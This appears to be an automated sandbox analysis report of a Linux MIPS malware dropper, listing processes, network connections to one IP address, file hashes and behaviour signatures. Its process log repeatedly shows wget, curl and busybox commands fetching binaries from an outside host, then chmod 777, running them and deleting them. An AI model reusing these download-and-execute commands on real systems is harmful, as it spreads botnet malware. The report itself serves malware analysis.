| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
Processes
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/chmod
[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ
[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/bin/rm
[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/chmod
[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q
[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/bin/rm
[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]
/usr/bin/wget
[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/chmod
[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0
[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/bin/rm
[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]
/usr/bin/wget
[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/chmod
[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0
[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/bin/rm
[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 02:42
Reported
2024-11-14 02:44
Platform
debian9-mipsel-20240611-en
Max time kernel
96s
Max time network
99s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
